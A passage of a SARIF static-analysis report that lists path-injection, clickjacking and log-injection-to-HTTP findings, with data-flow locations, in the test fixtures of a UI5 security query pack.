value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/Sources/test.js","uriBaseId":"%SRCROOT%","index":3},"region":{"startLine":5,"startColumn":17,"endColumn":33}}}],"partialFingerprints":{"primaryLocationLineHash":"45280b24f3d81287:1","primaryLocationStartColumnFingerprint":"12"},"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/Sources/test.js","uriBaseId":"%SRCROOT%","index":3},"region":{"startLine":5,"startColumn":17,"endColumn":33}},"message":{"text":"user-provided value"}}]},{"ruleId":"js/ui5-path-injection","rule":{"id":"js/ui5-path-injection","index":0,"toolComponent":{"index":4}},"message":{"text":"The path of a saved file depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":374},"region":{"startLine":17,"startColumn":43,"endColumn":61}}}],"partialFingerprints":{"primaryLocationLineHash":"68e5ff83e2198ff5:1","primaryLocationStartColumnFingerprint":"26"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":379},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":373},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":374},"region":{"startLine":8,"startColumn":23,"endColumn":38}},"message":{"text":"{ type: \"int\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":374},"region":{"startLine":17,"startColumn":43,"endColumn":61}},"message":{"text":"oControl.getText()"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":379},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":379},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-path-injection","rule":{"id":"js/ui5-path-injection","index":0,"toolComponent":{"index":4}},"message":{"text":"The path of a saved file depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":382},"region":{"startLine":23,"startColumn":43,"endColumn":55}}}],"partialFingerprints":{"primaryLocationLineHash":"b79de9dff4d8f842:1","primaryLocationStartColumnFingerprint":"26"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":387},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":383},"region":{"startLine":9,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":382},"region":{"startLine":9,"startColumn":23,"endColumn":41}},"message":{"text":"{ type: \"string\" }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":382},"region":{"startLine":15,"startColumn":29,"endColumn":47}},"message":{"text":"oControl.getText()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":382},"region":{"startLine":15,"startColumn":21,"endColumn":26}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":382},"region":{"startLine":17,"startColumn":53,"endColumn":58}},"message":{"text":"value"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":382},"region":{"startLine":17,"startColumn":46,"endColumn":59}},"message":{"text":"String(value)"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":382},"region":{"startLine":17,"startColumn":36,"endColumn":60}},"message":{"text":"encodeX ... value))"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":382},"region":{"startLine":17,"startColumn":21,"endColumn":33}},"message":{"text":"xssSanitized"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":382},"region":{"startLine":23,"startColumn":43,"endColumn":55}},"message":{"text":"xssSanitized"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":387},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":387},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-path-injection","rule":{"id":"js/ui5-path-injection","index":0,"toolComponent":{"index":4}},"message":{"text":"The path of a saved file depends on a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":391},"region":{"startLine":16,"startColumn":39,"endColumn":67}}}],"partialFingerprints":{"primaryLocationLineHash":"de27f6d546a116e8:1","primaryLocationStartColumnFingerprint":"26"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":395},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":391},"region":{"startLine":10,"startColumn":17,"endColumn":28}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":391},"region":{"startLine":16,"startColumn":39,"endColumn":67}},"message":{"text":"oModel. ... input')"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":395},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":395},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-clickjacking","rule":{"id":"js/ui5-clickjacking","index":1,"toolComponent":{"index":4}},"message":{"text":"Possible clickjacking vulnerability due to missing frame options."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html","uriBaseId":"%SRCROOT%","index":262},"region":{"startLine":2,"endColumn":16}}}],"partialFingerprints":{"primaryLocationLineHash":"7fe81114896a63c:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/ui5-clickjacking","rule":{"id":"js/ui5-clickjacking","index":1,"toolComponent":{"index":4}},"message":{"text":"Possible clickjacking vulnerability due to missing frame options."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html","uriBaseId":"%SRCROOT%","index":403},"region":{"startLine":2,"endColumn":16}}}],"partialFingerprints":{"primaryLocationLineHash":"df700c15dad274b2:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/ui5-clickjacking","rule":{"id":"js/ui5-clickjacking","index":1,"toolComponent":{"index":4}},"message":{"text":"Possible clickjacking vulnerability due to window\\[ ... onfig\"\\] being set to `allow`."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html","uriBaseId":"%SRCROOT%","index":259},"region":{"startLine":9,"startColumn":9,"endColumn":32}}}],"partialFingerprints":{"primaryLocationLineHash":"6152b8f74a1abdf5:1","primaryLocationStartColumnFingerprint":"0"}},{"ruleId":"js/ui5-clickjacking","rule":{"id":"js/ui5-clickjacking","index":1,"toolComponent":{"index":4}},"message":{"text":"Possible clickjacking vulnerability due to data-sap-ui-frameOptions=allow being set to `allow`."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html","uriBaseId":"%SRCROOT%","index":259},"region":{"startLine":28,"startColumn":34,"endColumn":66}}}],"partialFingerprints":{"primaryLocationLineHash":"b01bd23ca3666824:1","primaryLocationStartColumnFingerprint":"25"}},{"ruleId":"js/ui5-log-injection-to-http","rule":{"id":"js/ui5-log-injection-to-http","index":2,"toolComponent":{"index":4}},"message":{"text":"Outbound network request depends on [user-provided](1) log data."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":316},"region":{"startLine":11,"startColumn":19,"endColumn":26}}}],"partialFingerprints":{"primaryLocationLineHash":"83472515fe67207a:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":317},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":316},"region":{"startLine":7,"startColumn":23,"endColumn":42}},"message":{"text":"Log.getLogEntries()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":316},"region":{"startLine":7,"startColumn":13,"endColumn":20}},"message":{"text":"message"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":316},"region":{"startLine":11,"startColumn":19,"endColumn":26}},"message":{"text":"message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":317},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":317},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-log-injection-to-http","rule":{"id":"js/ui5-log-injection-to-http","index":2,"toolComponent":{"index":4}},"message":{"text":"Outbound network request depends on [user-provided](1) log data."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":24,"startColumn":23,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"de5157ed7a614f91:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":8,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":14,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":14,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":17,"startColumn":19,"endColumn":24}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":20,"startColumn":33,"endColumn":42}},"message":{"text":"oLogEntry"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":24,"startColumn":23,"endColumn":32}},"message":{"text":"oLogEntry"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321},"region":{"startLine":24,"startColumn":23,"endColumn":40}},"message":{"text":"oLogEntry.message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-log-injection-to-http","rule":{"id":"js/ui5-log-injection-to-http","index":2,"toolComponent":{"index":4}},"message":{"text":"Outbound network request depends on [user-provided](1) log data."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":332},"region":{"startLine":13,"startColumn":19,"endColumn":36}}}],"partialFingerprints":{"primaryLocationLineHash":"d67a8ded95b9934b:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":333},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":329},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":329},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":329},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":329},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":332},"region":{"startLine":9,"startColumn":29,"endColumn":38}},"message":{"text":"oLogEntry"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":332},"region":{"startLine":13,"startColumn":19,"endColumn":28}},"message":{"text":"oLogEntry"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":332},"region":{"startLine":13,"startColumn":19,"endColumn":36}},"message":{"text":"oLogEntry.message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":333},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":333},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-log-injection-to-http","rule":{"id":"js/ui5-log-injection-to-http","index":2,"toolComponent":{"index":4}},"message":{"text":"Outbound network request depends on [user-provided](1) log data."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":13,"startColumn":19,"endColumn":33}}}],"partialFingerprints":{"primaryLocationLineHash":"84768bf2b1d6e5a5:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":9,"startColumn":29,"endColumn":35}},"message":{"text":"oEvent"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":13,"startColumn":19,"endColumn":25}},"message":{"text":"oEvent"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359},"region":{"startLine":13,"startColumn":19,"endColumn":33}},"message":{"text":"oEvent.message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-log-injection-to-http","rule":{"id":"js/ui5-log-injection-to-http","index":2,"toolComponent":{"index":4}},"message":{"text":"Outbound network request depends on [user-provided](1) log data."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360},"region":{"startLine":11,"startColumn":19,"endColumn":26}}}],"partialFingerprints":{"primaryLocationLineHash":"83472515fe67207a:1","primaryLocationStartColumnFingerprint":"10"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"value={/input}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":11,"startColumn":11,"endColumn":22}},"message":{"text":"input: null"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":21,"endColumn":49}},"message":{"text":"oModel. ... input\")"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":17,"startColumn":13,"endColumn":18}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355},"region":{"startLine":18,"startColumn":30,"endColumn":35}},"message":{"text":"input"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360},"region":{"startLine":7,"startColumn":23,"endColumn":42}},"message":{"text":"Log.getLogEntries()"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360},"region":{"startLine":7,"startColumn":13,"endColumn":20}},"message":{"text":"message"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360},"region":{"startLine":11,"startColumn":19,"endColumn":26}},"message":{"text":"message"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}},"message":{"text":"user-provided"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361},"region":{"startLine":5,"startColumn":5,"endLine":7,"endColumn":29}}}]},{"ruleId":"js/ui5-